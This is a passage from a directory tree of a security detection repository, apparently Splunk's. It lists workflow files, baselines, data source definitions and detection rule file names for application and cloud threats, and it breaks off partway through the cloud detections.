├── .github
│   ├── CODEOWNERS
│   ├── CONTRIBUTING.md
│   ├── ISSUE_TEMPLATE
│   │   ├── bug_report.md
│   │   └── feature_request.md
│   ├── config.yml
│   ├── dependabot.yml
│   ├── labeler.yml
│   ├── pull_request_template.md
│   ├── stale.yml
│   └── workflows
│       ├── appinspect.yml
│       ├── build.yml
│       ├── datasource-dependabot.yml
│       ├── format_test_results.py
│       ├── labeler.yml
│       ├── unit-testing.yml
│       └── update_data_sources_ta.py
├── .gitignore
├── .gitlab
│   └── merge_request_templates
│       └── release_branch.md
├── .gitpod.yml
├── .pre-commit-config.yaml
├── .vscode
│   ├── launch.json
│   ├── security-content.code-snippets
│   └── settings.json
├── CODE_OF_CONDUCT.md
├── LICENSE
├── README.md
├── SECURITY.md
├── app_template
│   ├── README.md
│   ├── README
│   │   ├── essoc_story_detail.txt
│   │   └── essoc_summary.txt
│   ├── default
│   │   ├── data
│   │   │   └── ui
│   │   │       ├── nav
│   │   │       │   └── default.xml
│   │   │       └── views
│   │   │           ├── escu_summary.xml
│   │   │           └── feedback.xml
│   │   └── distsearch.conf
│   ├── lookups
│   │   └── mitre_enrichment.csv
│   ├── metadata
│   │   └── default.meta
│   └── static
│       ├── appIcon.png
│       ├── appIconAlt.png
│       ├── appIconAlt_2x.png
│       └── appIcon_2x.png
├── baselines
│   ├── baseline_of_blocked_outbound_traffic_from_aws.yml
│   ├── baseline_of_cloud_infrastructure_api_calls_per_user.yml
│   ├── baseline_of_cloud_instances_destroyed.yml
│   ├── baseline_of_cloud_instances_launched.yml
│   ├── baseline_of_cloud_security_group_api_calls_per_user.yml
│   ├── baseline_of_command_line_length___mltk.yml
│   ├── baseline_of_dns_query_length___mltk.yml
│   ├── baseline_of_kubernetes_container_network_io.yml
│   ├── baseline_of_kubernetes_container_network_io_ratio.yml
│   ├── baseline_of_kubernetes_process_resource.yml
│   ├── baseline_of_kubernetes_process_resource_ratio.yml
│   ├── baseline_of_network_acl_activity_by_arn.yml
│   ├── baseline_of_open_s3_bucket_decommissioning.yml
│   ├── baseline_of_s3_bucket_deletion_activity_by_arn.yml
│   ├── baseline_of_security_group_activity_by_arn.yml
│   ├── baseline_of_smb_traffic___mltk.yml
│   ├── count_of_assets_by_category.yml
│   ├── count_of_unique_ips_connecting_to_ports.yml
│   ├── create_a_list_of_approved_aws_service_accounts.yml
│   ├── deprecated
│   │   └── .gitkeep
│   ├── discover_dns_records.yml
│   ├── dnstwist_domain_names.yml
│   ├── identify_systems_creating_remote_desktop_traffic.yml
│   ├── identify_systems_receiving_remote_desktop_traffic.yml
│   ├── identify_systems_using_remote_desktop.yml
│   ├── previously_seen_cloud_api_calls_per_user_role___initial.yml
│   ├── previously_seen_cloud_api_calls_per_user_role___update.yml
│   ├── previously_seen_cloud_compute_creations_by_user___initial.yml
│   ├── previously_seen_cloud_compute_creations_by_user___update.yml
│   ├── previously_seen_cloud_compute_images___initial.yml
│   ├── previously_seen_cloud_compute_images___update.yml
│   ├── previously_seen_cloud_compute_instance_types___initial.yml
│   ├── previously_seen_cloud_compute_instance_types___update.yml
│   ├── previously_seen_cloud_instance_modifications_by_user___initial.yml
│   ├── previously_seen_cloud_instance_modifications_by_user___update.yml
│   ├── previously_seen_cloud_provisioning_activity_sources___initial.yml
│   ├── previously_seen_cloud_provisioning_activity_sources___update.yml
│   ├── previously_seen_cloud_regions___initial.yml
│   ├── previously_seen_cloud_regions___update.yml
│   ├── previously_seen_command_line_arguments.yml
│   ├── previously_seen_running_windows_services___initial.yml
│   ├── previously_seen_running_windows_services___update.yml
│   ├── previously_seen_s3_bucket_access_by_remote_ip.yml
│   ├── previously_seen_users_in_cloudtrail___initial.yml
│   ├── previously_seen_users_in_cloudtrail___update.yml
│   ├── previously_seen_zoom_child_processes___initial.yml
│   ├── previously_seen_zoom_child_processes___update.yml
│   ├── windows_updates_install_failures.yml
│   └── windows_updates_install_successes.yml
├── contentctl.yml
├── dashboards
│   ├── .gitkeep
│   ├── applocker.json
│   ├── applocker.yml
│   ├── rmm_software_tracking.json
│   ├── rmm_software_tracking.yml
│   ├── threat_activity_by_snort_ids.json
│   └── threat_activity_by_snort_ids.yml
├── data_sources
│   ├── asl_aws_cloudtrail.yml
│   ├── aws_cloudfront.yml
│   ├── aws_cloudtrail.yml
│   ├── aws_cloudtrail_assumerolewithsaml.yml
│   ├── aws_cloudtrail_consolelogin.yml
│   ├── aws_cloudtrail_copyobject.yml
│   ├── aws_cloudtrail_createaccesskey.yml
│   ├── aws_cloudtrail_createkey.yml
│   ├── aws_cloudtrail_createloginprofile.yml
│   ├── aws_cloudtrail_createnetworkaclentry.yml
│   ├── aws_cloudtrail_createpolicyversion.yml
│   ├── aws_cloudtrail_createsnapshot.yml
│   ├── aws_cloudtrail_createtask.yml
│   ├── aws_cloudtrail_createvirtualmfadevice.yml
│   ├── aws_cloudtrail_deactivatemfadevice.yml
│   ├── aws_cloudtrail_deleteaccountpasswordpolicy.yml
│   ├── aws_cloudtrail_deletealarms.yml
│   ├── aws_cloudtrail_deletedetector.yml
│   ├── aws_cloudtrail_deletegroup.yml
│   ├── aws_cloudtrail_deleteguardrail.yml
│   ├── aws_cloudtrail_deleteipset.yml
│   ├── aws_cloudtrail_deleteknowledgebase.yml
│   ├── aws_cloudtrail_deleteloggingconfiguration.yml
│   ├── aws_cloudtrail_deleteloggroup.yml
│   ├── aws_cloudtrail_deletelogstream.yml
│   ├── aws_cloudtrail_deletemodelinvocationloggingconfiguration.yml
│   ├── aws_cloudtrail_deletenetworkaclentry.yml
│   ├── aws_cloudtrail_deletepolicy.yml
│   ├── aws_cloudtrail_deleterule.yml
│   ├── aws_cloudtrail_deleterulegroup.yml
│   ├── aws_cloudtrail_deletesnapshot.yml
│   ├── aws_cloudtrail_deletetrail.yml
│   ├── aws_cloudtrail_deletevirtualmfadevice.yml
│   ├── aws_cloudtrail_deletewebacl.yml
│   ├── aws_cloudtrail_describeeventaggregates.yml
│   ├── aws_cloudtrail_describeimagescanfindings.yml
│   ├── aws_cloudtrail_describesnapshotattribute.yml
│   ├── aws_cloudtrail_getaccountpasswordpolicy.yml
│   ├── aws_cloudtrail_getobject.yml
│   ├── aws_cloudtrail_getpassworddata.yml
│   ├── aws_cloudtrail_invokemodel.yml
│   ├── aws_cloudtrail_jobcreated.yml
│   ├── aws_cloudtrail_listfoundationmodels.yml
│   ├── aws_cloudtrail_modifydbinstance.yml
│   ├── aws_cloudtrail_modifyimageattribute.yml
│   ├── aws_cloudtrail_modifysnapshotattribute.yml
│   ├── aws_cloudtrail_putbucketacl.yml
│   ├── aws_cloudtrail_putbucketlifecycle.yml
│   ├── aws_cloudtrail_putbucketreplication.yml
│   ├── aws_cloudtrail_putbucketversioning.yml
│   ├── aws_cloudtrail_putimage.yml
│   ├── aws_cloudtrail_putkeypolicy.yml
│   ├── aws_cloudtrail_replacenetworkaclentry.yml
│   ├── aws_cloudtrail_setdefaultpolicyversion.yml
│   ├── aws_cloudtrail_stoplogging.yml
│   ├── aws_cloudtrail_updateaccountpasswordpolicy.yml
│   ├── aws_cloudtrail_updateloginprofile.yml
│   ├── aws_cloudtrail_updatesamlprovider.yml
│   ├── aws_cloudtrail_updatetrail.yml
│   ├── aws_cloudwatchlogs_vpcflow.yml
│   ├── aws_security_hub.yml
│   ├── azure_active_directory.yml
│   ├── azure_active_directory_add_app_role_assignment_to_service_principal.yml
│   ├── azure_active_directory_add_member_to_role.yml
│   ├── azure_active_directory_add_owner_to_application.yml
│   ├── azure_active_directory_add_service_principal.yml
│   ├── azure_active_directory_add_unverified_domain.yml
│   ├── azure_active_directory_consent_to_application.yml
│   ├── azure_active_directory_disable_strong_authentication.yml
│   ├── azure_active_directory_enable_account.yml
│   ├── azure_active_directory_invite_external_user.yml
│   ├── azure_active_directory_microsoftgraphactivitylogs.yml
│   ├── azure_active_directory_noninteractiveusersigninlogs.yml
│   ├── azure_active_directory_reset_password_(by_admin).yml
│   ├── azure_active_directory_set_domain_authentication.yml
│   ├── azure_active_directory_sign_in_activity.yml
│   ├── azure_active_directory_update_application.yml
│   ├── azure_active_directory_update_authorization_policy.yml
│   ├── azure_active_directory_update_user.yml
│   ├── azure_active_directory_user_registered_security_info.yml
│   ├── azure_audit_create_or_update_an_azure_automation_account.yml
│   ├── azure_audit_create_or_update_an_azure_automation_runbook.yml
│   ├── azure_audit_create_or_update_an_azure_automation_webhook.yml
│   ├── azure_monitor_activity.yml
│   ├── bro_conn.yml
│   ├── bro_dns.yml
│   ├── bro_files.yml
│   ├── bro_http.yml
│   ├── bro_loaded_scripts.yml
│   ├── bro_ntp.yml
│   ├── bro_ocsp.yml
│   ├── bro_ssl.yml
│   ├── bro_weird.yml
│   ├── bro_x509.yml
│   ├── circleci.yml
│   ├── cisco_ai_defense_alerts.yml
│   ├── cisco_secure_application_appdynamics_alerts.yml
│   ├── cisco_secure_firewall_threat_defense_connection_event.yml
│   ├── cisco_secure_firewall_threat_defense_file_event.yml
│   ├── cisco_secure_firewall_threat_defense_intrusion_event.yml
│   ├── crowdstrike_processrollup2.yml
│   ├── crushftp.yml
│   ├── g_suite_drive.yml
│   ├── g_suite_gmail.yml
│   ├── github_enterprise_audit_logs.yml
│   ├── github_organizations_audit_logs.yml
│   ├── github_webhooks.yml
│   ├── google_workspace.yml
│   ├── google_workspace_login_failure.yml
│   ├── google_workspace_login_success.yml
│   ├── ivanti_vtm_audit.yml
│   ├── kubernetes_audit.yml
│   ├── kubernetes_falco.yml
│   ├── linux_auditd_add_user.yml
│   ├── linux_auditd_execve.yml
│   ├── linux_auditd_path.yml
│   ├── linux_auditd_proctitle.yml
│   ├── linux_auditd_service_stop.yml
│   ├── linux_auditd_syscall.yml
│   ├── linux_secure.yml
│   ├── ms365_defender_incident_alerts.yml
│   ├── ms_defender_atp_alerts.yml
│   ├── nginx_access.yml
│   ├── ntlm_operational_8004.yml
│   ├── ntlm_operational_8005.yml
│   ├── ntlm_operational_8006.yml
│   ├── o365.yml
│   ├── o365_add_app_role_assignment_grant_to_user_.yml
│   ├── o365_add_app_role_assignment_to_service_principal_.yml
│   ├── o365_add_mailboxpermission.yml
│   ├── o365_add_member_to_role_.yml
│   ├── o365_add_owner_to_application_.yml
│   ├── o365_add_service_principal_.yml
│   ├── o365_change_user_license_.yml
│   ├── o365_consent_to_application_.yml
│   ├── o365_disable_strong_authentication_.yml
│   ├── o365_mailitemsaccessed.yml
│   ├── o365_modifyfolderpermissions.yml
│   ├── o365_set_company_information_.yml
│   ├── o365_set_mailbox.yml
│   ├── o365_update_application_.yml
│   ├── o365_update_authorization_policy_.yml
│   ├── o365_update_user_.yml
│   ├── o365_userloggedin.yml
│   ├── o365_userloginfailed.yml
│   ├── office_365_reporting_message_trace.yml
│   ├── office_365_universal_audit_log.yml
│   ├── okta.yml
│   ├── osquery.yml
│   ├── palo_alto_network_threat.yml
│   ├── palo_alto_network_traffic.yml
│   ├── pingid.yml
│   ├── powershell_installed_iis_modules.yml
│   ├── powershell_script_block_logging_4104.yml
│   ├── powershell_sip_inventory.yml
│   ├── splunk.yml
│   ├── splunk_common_information_model_(cim).yml
│   ├── splunk_stream_http.yml
│   ├── splunk_stream_ip.yml
│   ├── splunk_stream_tcp.yml
│   ├── suricata.yml
│   ├── sysmon_eventid_1.yml
│   ├── sysmon_eventid_10.yml
│   ├── sysmon_eventid_11.yml
│   ├── sysmon_eventid_12.yml
│   ├── sysmon_eventid_13.yml
│   ├── sysmon_eventid_14.yml
│   ├── sysmon_eventid_15.yml
│   ├── sysmon_eventid_17.yml
│   ├── sysmon_eventid_18.yml
│   ├── sysmon_eventid_20.yml
│   ├── sysmon_eventid_21.yml
│   ├── sysmon_eventid_22.yml
│   ├── sysmon_eventid_23.yml
│   ├── sysmon_eventid_26.yml
│   ├── sysmon_eventid_3.yml
│   ├── sysmon_eventid_5.yml
│   ├── sysmon_eventid_6.yml
│   ├── sysmon_eventid_7.yml
│   ├── sysmon_eventid_8.yml
│   ├── sysmon_eventid_9.yml
│   ├── sysmon_for_linux_eventid_1.yml
│   ├── sysmon_for_linux_eventid_11.yml
│   ├── windows_active_directory_admon.yml
│   ├── windows_defender_alerts.yml
│   ├── windows_event_log_application_15457.yml
│   ├── windows_event_log_application_17135.yml
│   ├── windows_event_log_application_2282.yml
│   ├── windows_event_log_application_3000.yml
│   ├── windows_event_log_application_8128.yml
│   ├── windows_event_log_capi2_70.yml
│   ├── windows_event_log_capi2_81.yml
│   ├── windows_event_log_certificateservicesclient_1007.yml
│   ├── windows_event_log_defender_1121.yml
│   ├── windows_event_log_defender_1122.yml
│   ├── windows_event_log_defender_1125.yml
│   ├── windows_event_log_defender_1126.yml
│   ├── windows_event_log_defender_1129.yml
│   ├── windows_event_log_defender_1131.yml
│   ├── windows_event_log_defender_1132.yml
│   ├── windows_event_log_defender_1133.yml
│   ├── windows_event_log_defender_1134.yml
│   ├── windows_event_log_defender_5007.yml
│   ├── windows_event_log_microsoft_windows_terminalservices_rdpclient_1024.yml
│   ├── windows_event_log_printservice_316.yml
│   ├── windows_event_log_printservice_4909.yml
│   ├── windows_event_log_printservice_808.yml
│   ├── windows_event_log_remoteconnectionmanager_1149.yml
│   ├── windows_event_log_security_1100.yml
│   ├── windows_event_log_security_1102.yml
│   ├── windows_event_log_security_4624.yml
│   ├── windows_event_log_security_4625.yml
│   ├── windows_event_log_security_4627.yml
│   ├── windows_event_log_security_4648.yml
│   ├── windows_event_log_security_4662.yml
│   ├── windows_event_log_security_4663.yml
│   ├── windows_event_log_security_4672.yml
│   ├── windows_event_log_security_4688.yml
│   ├── windows_event_log_security_4698.yml
│   ├── windows_event_log_security_4699.yml
│   ├── windows_event_log_security_4700.yml
│   ├── windows_event_log_security_4702.yml
│   ├── windows_event_log_security_4703.yml
│   ├── windows_event_log_security_4719.yml
│   ├── windows_event_log_security_4720.yml
│   ├── windows_event_log_security_4724.yml
│   ├── windows_event_log_security_4725.yml
│   ├── windows_event_log_security_4726.yml
│   ├── windows_event_log_security_4727.yml
│   ├── windows_event_log_security_4728.yml
│   ├── windows_event_log_security_4730.yml
│   ├── windows_event_log_security_4731.yml
│   ├── windows_event_log_security_4732.yml
│   ├── windows_event_log_security_4737.yml
│   ├── windows_event_log_security_4738.yml
│   ├── windows_event_log_security_4739.yml
│   ├── windows_event_log_security_4741.yml
│   ├── windows_event_log_security_4742.yml
│   ├── windows_event_log_security_4744.yml
│   ├── windows_event_log_security_4749.yml
│   ├── windows_event_log_security_4754.yml
│   ├── windows_event_log_security_4759.yml
│   ├── windows_event_log_security_4768.yml
│   ├── windows_event_log_security_4769.yml
│   ├── windows_event_log_security_4771.yml
│   ├── windows_event_log_security_4776.yml
│   ├── windows_event_log_security_4781.yml
│   ├── windows_event_log_security_4783.yml
│   ├── windows_event_log_security_4790.yml
│   ├── windows_event_log_security_4794.yml
│   ├── windows_event_log_security_4798.yml
│   ├── windows_event_log_security_4876.yml
│   ├── windows_event_log_security_4886.yml
│   ├── windows_event_log_security_4887.yml
│   ├── windows_event_log_security_4946.yml
│   ├── windows_event_log_security_4947.yml
│   ├── windows_event_log_security_4948.yml
│   ├── windows_event_log_security_5136.yml
│   ├── windows_event_log_security_5137.yml
│   ├── windows_event_log_security_5140.yml
│   ├── windows_event_log_security_5141.yml
│   ├── windows_event_log_security_5145.yml
│   ├── windows_event_log_system_104.yml
│   ├── windows_event_log_system_4720.yml
│   ├── windows_event_log_system_4726.yml
│   ├── windows_event_log_system_4728.yml
│   ├── windows_event_log_system_7036.yml
│   ├── windows_event_log_system_7040.yml
│   ├── windows_event_log_system_7045.yml
│   ├── windows_event_log_taskscheduler_200.yml
│   ├── windows_event_log_taskscheduler_201.yml
│   ├── windows_iis.yml
│   ├── windows_iis_29.yml
│   └── zeek_conn.yml
├── deployments
│   ├── escu_default_configuration_anomaly.yml
│   ├── escu_default_configuration_baseline.yml
│   ├── escu_default_configuration_correlation.yml
│   ├── escu_default_configuration_hunting.yml
│   └── escu_default_configuration_ttp.yml
├── detections
│   ├── application
│   │   ├── cisco_ai_defense_security_alerts_by_application_name.yml
│   │   ├── cisco_secure_application_alerts.yml
│   │   ├── crushftp_server_side_template_injection.yml
│   │   ├── detect_distributed_password_spray_attempts.yml
│   │   ├── detect_html_help_spawn_child_process.yml
│   │   ├── detect_new_login_attempts_to_routers.yml
│   │   ├── detect_password_spray_attempts.yml
│   │   ├── email_attachments_with_lots_of_spaces.yml
│   │   ├── email_files_written_outside_of_the_outlook_directory.yml
│   │   ├── email_servers_sending_high_volume_traffic_to_hosts.yml
│   │   ├── ivanti_vtm_new_account_creation.yml
│   │   ├── monitor_email_for_brand_abuse.yml
│   │   ├── no_windows_updates_in_a_time_frame.yml
│   │   ├── okta_authentication_failed_during_mfa_challenge.yml
│   │   ├── okta_idp_lifecycle_modifications.yml
│   │   ├── okta_mfa_exhaustion_hunt.yml
│   │   ├── okta_mismatch_between_source_and_response_for_verify_push_request.yml
│   │   ├── okta_multi_factor_authentication_disabled.yml
│   │   ├── okta_multiple_accounts_locked_out.yml
│   │   ├── okta_multiple_failed_mfa_requests_for_user.yml
│   │   ├── okta_multiple_failed_requests_to_access_applications.yml
│   │   ├── okta_multiple_users_failing_to_authenticate_from_ip.yml
│   │   ├── okta_new_api_token_created.yml
│   │   ├── okta_new_device_enrolled_on_account.yml
│   │   ├── okta_phishing_detection_with_fastpass_origin_check.yml
│   │   ├── okta_risk_threshold_exceeded.yml
│   │   ├── okta_successful_single_factor_authentication.yml
│   │   ├── okta_suspicious_activity_reported.yml
│   │   ├── okta_suspicious_use_of_a_session_cookie.yml
│   │   ├── okta_threatinsight_threat_detected.yml
│   │   ├── okta_unauthorized_access_to_application.yml
│   │   ├── okta_user_logins_from_multiple_cities.yml
│   │   ├── pingid_mismatch_auth_source_and_verification_response.yml
│   │   ├── pingid_multiple_failed_mfa_requests_for_user.yml
│   │   ├── pingid_new_mfa_method_after_credential_reset.yml
│   │   ├── pingid_new_mfa_method_registered_for_user.yml
│   │   ├── suspicious_email_attachment_extensions.yml
│   │   └── suspicious_java_classes.yml
│   ├── cloud
│   │   ├── abnormally_high_number_of_cloud_infrastructure_api_calls.yml
│   │   ├── abnormally_high_number_of_cloud_instances_destroyed.yml
│   │   ├── abnormally_high_number_of_cloud_instances_launched.yml
│   │   ├── abnormally_high_number_of_cloud_security_group_api_calls.yml
│   │   ├── amazon_eks_kubernetes_cluster_scan_detection.yml
│   │   ├── amazon_eks_kubernetes_pod_scan_detection.yml
│   │   ├── asl_aws_concurrent_sessions_from_different_ips.yml
│   │   ├── asl_aws_create_access_key.yml
│   │   ├── asl_aws_create_policy_version_to_allow_all_resources.yml
│   │   ├── asl_aws_credential_access_getpassworddata.yml
│   │   ├── asl_aws_credential_access_rds_password_reset.yml
│   │   ├── asl_aws_defense_evasion_delete_cloudtrail.yml
│   │   ├── asl_aws_defense_evasion_delete_cloudwatch_log_group.yml
│   │   ├── asl_aws_defense_evasion_impair_security_services.yml
│   │   ├── asl_aws_defense_evasion_putbucketlifecycle.yml
│   │   ├── asl_aws_defense_evasion_stop_logging_cloudtrail.yml
│   │   ├── asl_aws_defense_evasion_update_cloudtrail.yml
│   │   ├── asl_aws_detect_users_creating_keys_with_encrypt_policy_without_mfa.yml
│   │   ├── asl_aws_disable_bucket_versioning.yml
│   │   ├── asl_aws_ec2_snapshot_shared_externally.yml
│   │   ├── asl_aws_ecr_container_upload_outside_business_hours.yml
│   │   ├── asl_aws_ecr_container_upload_unknown_user.yml
│   │   ├── asl_aws_iam_accessdenied_discovery_events.yml
│   │   ├── asl_aws_iam_assume_role_policy_brute_force.yml
│   │   ├── asl_aws_iam_delete_policy.yml
│   │   ├── asl_aws_iam_failure_group_deletion.yml
│   │   ├── asl_aws_iam_successful_group_deletion.yml
│   │   ├── asl_aws_multi_factor_authentication_disabled.yml
│   │   ├── asl_aws_network_access_control_list_created_with_all_open_ports.yml
│   │   ├── asl_aws_network_access_control_list_deleted.yml
│   │   ├── asl_aws_new_mfa_method_registered_for_user.yml
│   │   ├── asl_aws_saml_update_identity_provider.yml
│   │   ├── asl_aws_updateloginprofile.yml
│   │   ├── aws_ami_attribute_modification_for_exfiltration.yml
│   │   ├── aws_bedrock_delete_guardrails.yml
│   │   ├── aws_bedrock_delete_knowledge_base.yml
│   │   ├── aws_bedrock_delete_model_invocation_logging_configuration.yml
│   │   ├── aws_bedrock_high_number_list_foundation_model_failures.yml
│   │   ├── aws_bedrock_invoke_model_access_denied.yml
│   │   ├── aws_concurrent_sessions_from_different_ips.yml
│   │   ├── aws_console_login_failed_during_mfa_challenge.yml
│   │   ├── aws_create_policy_version_to_allow_all_resources.yml
│   │   ├── aws_createaccesskey.yml
│   │   ├── aws_createloginprofile.yml
│   │   ├── aws_credential_access_failed_login.yml
│   │   ├── aws_credential_access_getpassworddata.yml
│   │   ├── aws_credential_access_rds_password_reset.yml
│   │   ├── aws_defense_evasion_delete_cloudtrail.yml
│   │   ├── aws_defense_evasion_delete_cloudwatch_log_group.yml
│   │   ├── aws_defense_evasion_impair_security_services.yml
│   │   ├── aws_defense_evasion_putbucketlifecycle.yml
│   │   ├── aws_defense_evasion_stop_logging_cloudtrail.yml
│   │   ├── aws_defense_evasion_update_cloudtrail.yml
│   │   ├── aws_detect_users_creating_keys_with_encrypt_policy_without_mfa.yml
│   │   ├── aws_detect_users_with_kms_keys_performing_encryption_s3.yml
│   │   ├── aws_disable_bucket_versioning.yml
│   │   ├── aws_ec2_snapshot_shared_externally.yml
│   │   ├── aws_ecr_container_scanning_findings_high.yml
│   │   ├── aws_ecr_container_scanning_findings_low_informational_unknown.yml
│   │   ├── aws_ecr_container_scanning_findings_medium.yml
│   │   ├── aws_ecr_container_upload_outside_business_hours.yml
│   │   ├── aws_ecr_container_upload_unknown_user.yml
│   │   ├── aws_excessive_security_scanning.yml
│   │   ├── aws_exfiltration_via_anomalous_getobject_api_activity.yml
│   │   ├── aws_exfiltration_via_batch_service.yml
│   │   ├── aws_exfiltration_via_bucket_replication.yml
│   │   ├── aws_exfiltration_via_datasync_task.yml
│   │   ├── aws_exfiltration_via_ec2_snapshot.yml
│   │   ├── aws_high_number_of_failed_authentications_for_user.yml
│   │   ├── aws_high_number_of_failed_authentications_from_ip.yml
│   │   ├── aws_iam_accessdenied_discovery_events.yml
│   │   ├── aws_iam_assume_role_policy_brute_force.yml
│   │   ├── aws_iam_delete_policy.yml
│   │   ├── aws_iam_failure_group_deletion.yml
│   │   ├── aws_iam_successful_group_deletion.yml
│   │   ├── aws_lambda_updatefunctioncode.yml
│   │   ├── aws_multi_factor_authentication_disabled.yml
│   │   ├── aws_multiple_failed_mfa_requests_for_user.yml
│   │   ├── aws_multiple_users_failing_to_authenticate_from_ip.yml
│   │   ├── aws_network_access_control_list_created_with_all_open_ports.yml
│   │   ├── aws_network_access_control_list_deleted.yml
│   │   ├── aws_new_mfa_method_registered_for_user.yml
│   │   ├── aws_password_policy_changes.yml
│   │   ├── aws_s3_exfiltration_behavior_identified.yml
│   │   ├── aws_saml_update_identity_provider.yml
│   │   ├── aws_setdefaultpolicyversion.yml
│   │   ├── aws_successful_console_authentication_from_multiple_ips.yml
│   │   ├── aws_successful_single_factor_authentication.yml
│   │   ├── aws_unusual_number_of_failed_authentications_from_ip.yml
│   │   ├── aws_updateloginprofile.yml
│   │   ├── azure_active_directory_high_risk_sign_in.yml
│   │   ├── azure_ad_admin_consent_bypassed_by_service_principal.yml
│   │   ├── azure_ad_application_administrator_role_assigned.yml
│   │   ├── azure_ad_authentication_failed_during_mfa_challenge.yml
│   │   ├── azure_ad_azurehound_useragent_detected.yml
│   │   ├── azure_ad_block_user_consent_for_risky_apps_disabled.yml
│   │   ├── azure_ad_concurrent_sessions_from_different_ips.yml
│   │   ├── azure_ad_device_code_authentication.yml
│   │   ├── azure_ad_external_guest_user_invited.yml
│   │   ├── azure_ad_fullaccessasapp_permission_assigned.yml
│   │   ├── azure_ad_global_administrator_role_assigned.yml
│   │   ├── azure_ad_high_number_of_failed_authentications_for_user.yml
│   │   ├── azure_ad_high_number_of_failed_authentications_from_ip.yml
│   │   ├── azure_ad_multi_factor_authentication_disabled.yml
│   │   ├── azure_ad_multi_source_failed_authentications_spike.yml
│   │   ├── azure_ad_multiple_appids_and_useragents_authentication_spike.yml
│   │   ├── azure_ad_multiple_denied_mfa_requests_for_user.yml
│   │   ├── azure_ad_multiple_failed_mfa_requests_for_user.yml
│   │   ├── azure_ad_multiple_service_principals_created_by_sp.yml
│   │   ├── azure_ad_multiple_service_principals_created_by_user.yml
│   │   ├── azure_ad_multiple_users_failing_to_authenticate_from_ip.yml
│   │   ├── azure_ad_new_custom_domain_added.yml
│   │   ├── azure_ad_new_federated_domain_added.yml
│   │   ├── azure_ad_new_mfa_method_registered.yml
│   │   ├── azure_ad_new_mfa_method_registered_for_user.yml
│   │   ├── azure_ad_oauth_application_consent_granted_by_user.yml
│   │   ├── azure_ad_pim_role_assigned.yml
│   │   ├── azure_ad_pim_role_assignment_activated.yml
│   │   ├── azure_ad_privileged_authentication_administrator_role_assigned.yml
│   │   ├── azure_ad_privileged_graph_api_permission_assigned.yml
│   │   ├── azure_ad_privileged_role_assigned.yml
│   │   ├── azure_ad_privileged_role_assigned_to_service_principal.yml
│   │   ├── azure_ad_service_principal_authentication.yml
│   │   ├── azure_ad_service_principal_created.yml
│   │   ├── azure_ad_service_principal_enumeration.yml
│   │   ├── azure_ad_service_principal_new_client_credentials.yml
│   │   ├── azure_ad_service_principal_owner_added.yml
│   │   ├── azure_ad_service_principal_privilege_escalation.yml
│   │   ├── azure_ad_successful_authentication_from_different_ips.yml
│   │   ├── azure_ad_successful_powershell_authentication.yml
│   │   ├── azure_ad_successful_single_factor_authentication.yml
│   │   ├── azure_ad_tenant_wide_admin_consent_granted.yml
│   │   ├── azure_ad_unusual_number_of_failed_authentications_from_ip.yml
│   │   ├── azure_ad_user_consent_blocked_for_risky_application.yml
│   │   ├── azure_ad_user_consent_denied_for_oauth_application.yml
│   │   ├── azure_ad_user_enabled_and_password_reset.yml
│   │   ├── azure_ad_user_immutableid_attribute_updated.yml
│   │   ├── azure_automation_account_created.yml
│   │   ├── azure_automation_runbook_created.yml
│   │   ├── azure_runbook_webhook_created.yml
│   │   ├── circle_ci_disable_security_job.yml
│   │   ├── circle_ci_disable_security_step.yml
│   │   ├── cloud_api_calls_from_previously_unseen_user_roles.yml
│   │   ├── cloud_compute_instance_created_by_previously_unseen_user.yml
│   │   ├── cloud_compute_instance_created_in_previously_unused_region.yml
│   │   ├── cloud_compute_instance_created_with_previously_unseen_image.yml
│   │   ├── cloud_compute_instance_created_with_previously_unseen_instance_type.yml
│   │   ├── cloud_instance_modified_by_previously_unseen_user.yml
│   │   ├── cloud_provisioning_activity_from_previously_unseen_city.yml
│   │   ├── cloud_provisioning_activity_from_previously_unseen_country.yml
│   │   ├── cloud_provisioning_activity_from_previously_unseen_ip_address.yml
│   │   ├── cloud_provisioning_activity_from_previously_unseen_region.yml
│   │   ├── cloud_security_groups_modifications_by_user.yml
│   │   ├── detect_aws_console_login_by_new_user.yml
│   │   ├── detect_aws_console_login_by_user_from_new_city.yml
│   │   ├── detect_aws_console_login_by_user_from_new_country.yml
│   │   ├── detect_aws_console_login_by_user_from_new_region.yml
│   │   ├── detect_gcp_storage_access_from_a_new_ip.yml
│   │   ├── detect_new_open_gcp_storage_buckets.yml
│   │   ├── detect_new_open_s3_buckets.yml
│   │   ├── detect_new_open_s3_buckets_over_aws_cli.yml
│   │   ├── detect_s3_access_from_a_new_ip.yml
│   │   ├── detect_spike_in_aws_security_hub_alerts_for_ec2_instance.yml
│   │   ├── detect_spike_in_aws_security_hub_alerts_for_user.yml
│   │   ├── detect_spike_in_blocked_outbound_traffic_from_your_aws.yml
│   │   ├── detect_spike_in_s3_bucket_deletion.yml
│   │   ├── gcp_authentication_failed_during_mfa_challenge.yml
│   │   ├── gcp_detect_gcploit_framework.yml
│   │   ├── gcp_kubernetes_cluster_pod_scan_detection.yml
│   │   ├── gcp_multi_factor_authentication_disabled.yml
│   │   ├── gcp_multiple_failed_mfa_requests_for_user.yml
│   │   ├── gcp_multiple_users_failing_to_authenticate_from_ip.yml
│   │   ├── gcp_successful_single_factor_authentication.yml
│   │   ├── gcp_unusual_number_of_failed_authentications_from_ip.yml
│   │   ├── gdrive_suspicious_file_sharing.yml
│   │   ├── github_enterprise_delete_branch_ruleset.yml
│   │   ├── github_enterprise_disable_2fa_requirement.yml
│   │   ├── github_enterprise_disable_audit_log_event_stream.yml
│   │   ├── github_enterprise_disable_classic_branch_protection_rule.yml
│   │   ├── github_enterprise_disable_dependabot.yml
│   │   ├── github_enterprise_disable_ip_allow_list.yml
│   │   ├── github_enterprise_modify_audit_log_event_stream.yml
│   │   ├── github_enterprise_pause_audit_log_event_stream.yml
│   │   ├── github_enterprise_register_self_hosted_runner.yml
│   │   ├── github_enterprise_remove_organization.yml
│   │   ├── github_enterprise_repository_archived.yml
│   │   ├── github_enterprise_repository_deleted.yml
│   │   ├── github_organizations_delete_branch_ruleset.yml
│   │   ├── github_organizations_disable_2fa_requirement.yml
│   │   ├── github_organizations_disable_classic_branch_protection_rule.yml
│   │   ├── github_organizations_disable_dependabot.yml
│   │   ├── github_organizations_repository_archived.yml
│   │   ├── github_organizations_repository_deleted.yml
│   │   ├── gsuite_drive_share_in_external_email.yml
│   │   ├── gsuite_email_suspicious_attachment.yml
│   │   ├── gsuite_email_suspicious_subject_with_attachment.yml
│   │   ├── gsuite_email_with_known_abuse_web_service_link.yml
│   │   ├── gsuite_outbound_email_with_attachment_to_external_domain.yml
│   │   ├── gsuite_suspicious_calendar_invite.yml
